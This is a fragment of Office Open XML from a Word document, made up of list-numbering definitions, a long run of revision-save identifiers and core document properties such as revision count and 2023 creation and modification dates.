  <w:num w:numId="3" w16cid:durableId="35199624">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="452286446">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="164320764">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1121531193">
    <w:abstractNumId w:val="10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5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="71632907">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="361394383">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1358434028">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1267690456">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="143898540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C29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6C2"/>
    <w:rsid w:val="000423CF"/>
    <w:rsid w:val="00042C53"/>
    <w:rsid w:val="000443DB"/>
    <w:rsid w:val="00044946"/>
    <w:rsid w:val="00045D77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488A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0537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57E5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8BB"/>
    <w:rsid w:val="000D7FE8"/>
    <w:rsid w:val="000E0D2D"/>
    <w:rsid w:val="000E0EBF"/>
    <w:rsid w:val="000E164D"/>
    <w:rsid w:val="000E2A9E"/>
    <w:rsid w:val="000E4826"/>
    <w:rsid w:val="000E4CA9"/>
    <w:rsid w:val="000E5278"/>
    <w:rsid w:val="000E59E8"/>
    <w:rsid w:val="000F0F18"/>
    <w:rsid w:val="000F1EF1"/>
    <w:rsid w:val="000F2C3D"/>
    <w:rsid w:val="000F3601"/>
    <w:rsid w:val="000F3D7C"/>
    <w:rsid w:val="000F5C9C"/>
    <w:rsid w:val="000F6F39"/>
    <w:rsid w:val="00100542"/>
    <w:rsid w:val="001009F6"/>
    <w:rsid w:val="001050FC"/>
    <w:rsid w:val="001122CB"/>
    <w:rsid w:val="0011236A"/>
    <w:rsid w:val="001133CB"/>
    <w:rsid w:val="00114082"/>
    <w:rsid w:val="00117631"/>
    <w:rsid w:val="00120DC3"/>
    <w:rsid w:val="00121F4C"/>
    <w:rsid w:val="00123A0C"/>
    <w:rsid w:val="00125179"/>
    <w:rsid w:val="00130A35"/>
    <w:rsid w:val="001320DE"/>
    <w:rsid w:val="00133B31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98C"/>
    <w:rsid w:val="00162043"/>
    <w:rsid w:val="001646DA"/>
    <w:rsid w:val="00164850"/>
    <w:rsid w:val="00164F6C"/>
    <w:rsid w:val="001670F1"/>
    <w:rsid w:val="001701F1"/>
    <w:rsid w:val="001705DA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09AE"/>
    <w:rsid w:val="001A184F"/>
    <w:rsid w:val="001A2D64"/>
    <w:rsid w:val="001A382F"/>
    <w:rsid w:val="001A647D"/>
    <w:rsid w:val="001A775F"/>
    <w:rsid w:val="001B03C5"/>
    <w:rsid w:val="001B1134"/>
    <w:rsid w:val="001B412E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644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2ABA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274C1"/>
    <w:rsid w:val="00230B64"/>
    <w:rsid w:val="00231E80"/>
    <w:rsid w:val="00233AA3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520C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50AA"/>
    <w:rsid w:val="00306D3A"/>
    <w:rsid w:val="00307060"/>
    <w:rsid w:val="0030747C"/>
    <w:rsid w:val="003114A2"/>
    <w:rsid w:val="00311B19"/>
    <w:rsid w:val="003124F3"/>
    <w:rsid w:val="003128BA"/>
    <w:rsid w:val="00313327"/>
    <w:rsid w:val="00313B37"/>
    <w:rsid w:val="00314EE2"/>
    <w:rsid w:val="0031572C"/>
    <w:rsid w:val="0032081D"/>
    <w:rsid w:val="00320AE3"/>
    <w:rsid w:val="00322C24"/>
    <w:rsid w:val="00326341"/>
    <w:rsid w:val="00330300"/>
    <w:rsid w:val="00332CB8"/>
    <w:rsid w:val="0033364D"/>
    <w:rsid w:val="0033581F"/>
    <w:rsid w:val="003363BE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20C3"/>
    <w:rsid w:val="003633B2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2959"/>
    <w:rsid w:val="003B488E"/>
    <w:rsid w:val="003B5FC2"/>
    <w:rsid w:val="003B67F3"/>
    <w:rsid w:val="003C1F7C"/>
    <w:rsid w:val="003C28D4"/>
    <w:rsid w:val="003C4779"/>
    <w:rsid w:val="003C558E"/>
    <w:rsid w:val="003C6EAF"/>
    <w:rsid w:val="003C76A1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D22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450"/>
    <w:rsid w:val="00456BE3"/>
    <w:rsid w:val="00457F05"/>
    <w:rsid w:val="00464CFB"/>
    <w:rsid w:val="004657A2"/>
    <w:rsid w:val="004669A1"/>
    <w:rsid w:val="00466CD0"/>
    <w:rsid w:val="00470688"/>
    <w:rsid w:val="004716B0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977A9"/>
    <w:rsid w:val="004A0329"/>
    <w:rsid w:val="004A1128"/>
    <w:rsid w:val="004A3657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B791F"/>
    <w:rsid w:val="004C10CF"/>
    <w:rsid w:val="004C1BCA"/>
    <w:rsid w:val="004C4D4F"/>
    <w:rsid w:val="004C6570"/>
    <w:rsid w:val="004D03DD"/>
    <w:rsid w:val="004D07CC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3E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6F5"/>
    <w:rsid w:val="005067D5"/>
    <w:rsid w:val="00506B09"/>
    <w:rsid w:val="00511406"/>
    <w:rsid w:val="005140B4"/>
    <w:rsid w:val="00514C85"/>
    <w:rsid w:val="005171F1"/>
    <w:rsid w:val="0052075B"/>
    <w:rsid w:val="0052292D"/>
    <w:rsid w:val="00524081"/>
    <w:rsid w:val="005253CF"/>
    <w:rsid w:val="0052587B"/>
    <w:rsid w:val="0053014B"/>
    <w:rsid w:val="00532A9C"/>
    <w:rsid w:val="00532F58"/>
    <w:rsid w:val="00534B79"/>
    <w:rsid w:val="00536101"/>
    <w:rsid w:val="00541A11"/>
    <w:rsid w:val="00544677"/>
    <w:rsid w:val="00545389"/>
    <w:rsid w:val="005459D4"/>
    <w:rsid w:val="0054691A"/>
    <w:rsid w:val="00547523"/>
    <w:rsid w:val="00547F53"/>
    <w:rsid w:val="00550B25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9733F"/>
    <w:rsid w:val="005A62A6"/>
    <w:rsid w:val="005A714B"/>
    <w:rsid w:val="005A719C"/>
    <w:rsid w:val="005B0347"/>
    <w:rsid w:val="005B1631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39E9"/>
    <w:rsid w:val="005D4417"/>
    <w:rsid w:val="005D4758"/>
    <w:rsid w:val="005D5C46"/>
    <w:rsid w:val="005D63E9"/>
    <w:rsid w:val="005E1031"/>
    <w:rsid w:val="005E1F6C"/>
    <w:rsid w:val="005E319A"/>
    <w:rsid w:val="005E439C"/>
    <w:rsid w:val="005E56CE"/>
    <w:rsid w:val="005E7F7E"/>
    <w:rsid w:val="005F2468"/>
    <w:rsid w:val="005F40C6"/>
    <w:rsid w:val="005F54E6"/>
    <w:rsid w:val="006004DF"/>
    <w:rsid w:val="00600CB8"/>
    <w:rsid w:val="00601115"/>
    <w:rsid w:val="00601B2B"/>
    <w:rsid w:val="0060240F"/>
    <w:rsid w:val="00603991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2DBE"/>
    <w:rsid w:val="00673311"/>
    <w:rsid w:val="00673A67"/>
    <w:rsid w:val="0067582A"/>
    <w:rsid w:val="0067668D"/>
    <w:rsid w:val="00677287"/>
    <w:rsid w:val="00683037"/>
    <w:rsid w:val="00683A39"/>
    <w:rsid w:val="00684FDC"/>
    <w:rsid w:val="00685223"/>
    <w:rsid w:val="0068551E"/>
    <w:rsid w:val="006904B7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1C46"/>
    <w:rsid w:val="00722283"/>
    <w:rsid w:val="00725D1E"/>
    <w:rsid w:val="007355D4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2D16"/>
    <w:rsid w:val="007651AD"/>
    <w:rsid w:val="00766D37"/>
    <w:rsid w:val="00773BBE"/>
    <w:rsid w:val="00774EB7"/>
    <w:rsid w:val="00775C2A"/>
    <w:rsid w:val="00776B1F"/>
    <w:rsid w:val="007776E0"/>
    <w:rsid w:val="007801F0"/>
    <w:rsid w:val="0078056C"/>
    <w:rsid w:val="007813A6"/>
    <w:rsid w:val="007841AF"/>
    <w:rsid w:val="00785D8D"/>
    <w:rsid w:val="00785F96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1A3C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2EAF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3B1F"/>
    <w:rsid w:val="00897134"/>
    <w:rsid w:val="008A0EF9"/>
    <w:rsid w:val="008A1F16"/>
    <w:rsid w:val="008A21AA"/>
    <w:rsid w:val="008A3D08"/>
    <w:rsid w:val="008A3DB3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C4137"/>
    <w:rsid w:val="008C50DD"/>
    <w:rsid w:val="008D0072"/>
    <w:rsid w:val="008D023C"/>
    <w:rsid w:val="008D1A07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3C79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26FF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5705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1D4E"/>
    <w:rsid w:val="009C3A2F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20B"/>
    <w:rsid w:val="00A3365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3F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6DE5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926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474"/>
    <w:rsid w:val="00B71C41"/>
    <w:rsid w:val="00B72445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4E4"/>
    <w:rsid w:val="00BC0BB6"/>
    <w:rsid w:val="00BC2B09"/>
    <w:rsid w:val="00BC2E69"/>
    <w:rsid w:val="00BC59C7"/>
    <w:rsid w:val="00BC6A17"/>
    <w:rsid w:val="00BD13B5"/>
    <w:rsid w:val="00BD1842"/>
    <w:rsid w:val="00BD1BEE"/>
    <w:rsid w:val="00BD1E7E"/>
    <w:rsid w:val="00BD245C"/>
    <w:rsid w:val="00BD304A"/>
    <w:rsid w:val="00BD31BA"/>
    <w:rsid w:val="00BD39B9"/>
    <w:rsid w:val="00BD61F5"/>
    <w:rsid w:val="00BD66C1"/>
    <w:rsid w:val="00BE01A4"/>
    <w:rsid w:val="00BE2827"/>
    <w:rsid w:val="00BE3162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26B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0F86"/>
    <w:rsid w:val="00C44D48"/>
    <w:rsid w:val="00C44E6D"/>
    <w:rsid w:val="00C45ECA"/>
    <w:rsid w:val="00C45F90"/>
    <w:rsid w:val="00C46561"/>
    <w:rsid w:val="00C47450"/>
    <w:rsid w:val="00C5013B"/>
    <w:rsid w:val="00C502E8"/>
    <w:rsid w:val="00C528CE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172"/>
    <w:rsid w:val="00C93DF4"/>
    <w:rsid w:val="00CA081E"/>
    <w:rsid w:val="00CA5C02"/>
    <w:rsid w:val="00CA69ED"/>
    <w:rsid w:val="00CB0132"/>
    <w:rsid w:val="00CB0F00"/>
    <w:rsid w:val="00CB1540"/>
    <w:rsid w:val="00CB1F2E"/>
    <w:rsid w:val="00CB2607"/>
    <w:rsid w:val="00CB3994"/>
    <w:rsid w:val="00CB45B3"/>
    <w:rsid w:val="00CB5320"/>
    <w:rsid w:val="00CB540C"/>
    <w:rsid w:val="00CB56E7"/>
    <w:rsid w:val="00CB586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3C8D"/>
    <w:rsid w:val="00CE40AF"/>
    <w:rsid w:val="00CE43FD"/>
    <w:rsid w:val="00CE447E"/>
    <w:rsid w:val="00CE6157"/>
    <w:rsid w:val="00CE64A9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35"/>
    <w:rsid w:val="00D03AE1"/>
    <w:rsid w:val="00D07A84"/>
    <w:rsid w:val="00D1219E"/>
    <w:rsid w:val="00D13B78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5D54"/>
    <w:rsid w:val="00DC6134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8F2"/>
    <w:rsid w:val="00DE2D37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1BF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6879"/>
    <w:rsid w:val="00E77C08"/>
    <w:rsid w:val="00E80343"/>
    <w:rsid w:val="00E8263F"/>
    <w:rsid w:val="00E84C40"/>
    <w:rsid w:val="00E85031"/>
    <w:rsid w:val="00E86C41"/>
    <w:rsid w:val="00E872CD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65B"/>
    <w:rsid w:val="00EA29A2"/>
    <w:rsid w:val="00EA4661"/>
    <w:rsid w:val="00EA56BA"/>
    <w:rsid w:val="00EA77C2"/>
    <w:rsid w:val="00EB06F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C7F89"/>
    <w:rsid w:val="00ED04F2"/>
    <w:rsid w:val="00ED22C4"/>
    <w:rsid w:val="00ED2D28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6CE"/>
    <w:rsid w:val="00F14F7C"/>
    <w:rsid w:val="00F165FC"/>
    <w:rsid w:val="00F17DB7"/>
    <w:rsid w:val="00F224F6"/>
    <w:rsid w:val="00F22837"/>
    <w:rsid w:val="00F24539"/>
    <w:rsid w:val="00F24809"/>
    <w:rsid w:val="00F25B1F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A6C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8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AN</cp:lastModifiedBy>
  <cp:revision>122</cp:revision>
  <cp:lastPrinted>2019-03-26T14:54:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-11T04:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-25T17:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>